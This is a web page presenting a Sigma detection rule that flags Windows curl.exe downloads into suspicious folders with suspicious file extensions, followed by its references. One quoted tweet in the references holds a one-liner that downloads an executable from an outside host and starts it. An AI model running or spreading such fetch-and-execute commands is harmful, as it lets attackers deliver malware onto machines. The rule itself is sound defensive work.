Suspicious Curl.EXE Download

calendar Aug 12, 2024 · attack.command-and-control attack.t1105  ·
Share on: linkedin copy

Detects a suspicious curl process start on Windows and outputs the requested document to a local file

Sigma rule (View on GitHub)

 1title: Suspicious Curl.EXE Download
 2id: e218595b-bbe7-4ee5-8a96-f32a24ad3468
 3related:
 4    - id: bbeaed61-1990-4773-bf57-b81dbad7db2d # Basic curl execution
 5      type: derived
 6    - id: 9a517fca-4ba3-4629-9278-a68694697b81 # Curl download
 7      type: similar
 8status: test
 9description: Detects a suspicious curl process start on Windows and outputs the requested document to a local file
10references:
11    - https://twitter.com/max_mal_/status/1542461200797163522
12    - https://web.archive.org/web/20200128160046/https://twitter.com/reegun21/status/1222093798009790464
13    - https://github.com/pr0xylife/Qakbot/blob/4f0795d79dabee5bc9dd69f17a626b48852e7869/Qakbot_AA_23.06.2022.txt
14    - https://www.volexity.com/blog/2022/07/28/sharptongue-deploys-clever-mail-stealing-browser-extension-sharpext/
15    - https://github.com/redcanaryco/atomic-red-team/blob/0f229c0e42bfe7ca736a14023836d65baa941ed2/atomics/T1105/T1105.md#atomic-test-18---curl-download-file
16author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
17date: 2020-07-03
18modified: 2023-02-21
19tags:
20    - attack.command-and-control
21    - attack.t1105
22logsource:
23    category: process_creation
24    product: windows
25detection:
26    selection_curl:
27        - Image|endswith: '\curl.exe'
28        - Product: 'The curl executable'
29    selection_susp_locations:
30        CommandLine|contains:
31            - '%AppData%'
32            - '%Public%'
33            - '%Temp%'
34            - '%tmp%'
35            - '\AppData\'
36            - '\Desktop\'
37            - '\Temp\'
38            - '\Users\Public\'
39            - 'C:\PerfLogs\'
40            - 'C:\ProgramData\'
41            - 'C:\Windows\Temp\'
42    selection_susp_extensions:
43        CommandLine|endswith:
44            - '.dll'
45            - '.gif'
46            - '.jpeg'
47            - '.jpg'
48            - '.png'
49            - '.temp'
50            - '.tmp'
51            - '.txt'
52            - '.vbe'
53            - '.vbs'
54    filter_optional_git_windows:
55        # Example FP
56        #   CommandLine: "C:\Program Files\Git\mingw64\bin\curl.exe" --silent --show-error --output C:/Users/test/AppData/Local/Temp/gfw-httpget-jVOEoxbS.txt --write-out %{http_code} https://gitforwindows.org/latest-tag.txt
57        ParentImage: 'C:\Program Files\Git\usr\bin\sh.exe'
58        Image: 'C:\Program Files\Git\mingw64\bin\curl.exe'
59        CommandLine|contains|all:
60            - '--silent --show-error --output '
61            - 'gfw-httpget-'
62            - 'AppData'
63    condition: selection_curl and 1 of selection_susp_* and not 1 of filter_optional_*
64falsepositives:
65    - Unknown
66level: high

References

  • x.com


    Read More

  • Reegun on Twitter

    “#Curl.exe is the new #rundll32.exe  -  #LOLbin Affected systems - Windows 10 build 17063 and Later curl -O http://192.168.191.1/shell191.exe & start shell191.exe More info - https://t.co/LGz8xIYiA2 https://t.co/0HrnbSvMH7 #blueteam #redteam #dfir #ThreatHunting”


    Read More

  • Qakbot/Qakbot_AA_23.06.2022.txt at 4f0795d79dabee5bc9dd69f17a626b48852e7869 · pr0xylife/Qakbot

    Contribute to pr0xylife/Qakbot development by creating an account on GitHub.


    Read More

  • SharpTongue Deploys Clever Mail-Stealing Browser Extension "SHARPEXT"

    Volexity tracks a variety of threat actors to provide unique insights and actionable information to its Threat Intelligence customers. One frequently encountered—that often results in forensics investigations on compromised systems—is tracked by Volexity as SharpTongue. This actor is believed to be North Korean in origin and is often publicly referred to under the name Kimsuky. The definition of which threat activity comprises Kimsuky is a matter of debate amongst threat intelligence analysts. Some publications refer to North Korean threat activity as Kimsuky that Volexity tracks under other group names and does not map back to SharpTongue. Volexity frequently observes SharpTongue targeting and victimizing individuals working for organizations in the United States, Europe and South Korea who work on topics involving North Korea, nuclear issues, weapons systems, and other matters of strategic interest to North Korea. SharpTongue's toolset is well documented in public sources; the most recent English-language post covering this toolset […]


    Read More

  • atomic-red-team/atomics/T1105/T1105.md at 0f229c0e42bfe7ca736a14023836d65baa941ed2 · redcanaryco/atomic-red-team

    Small and highly portable detection tests based on MITRE's ATT&CK. - redcanaryco/atomic-red-team


    Read More

Related rules

to-top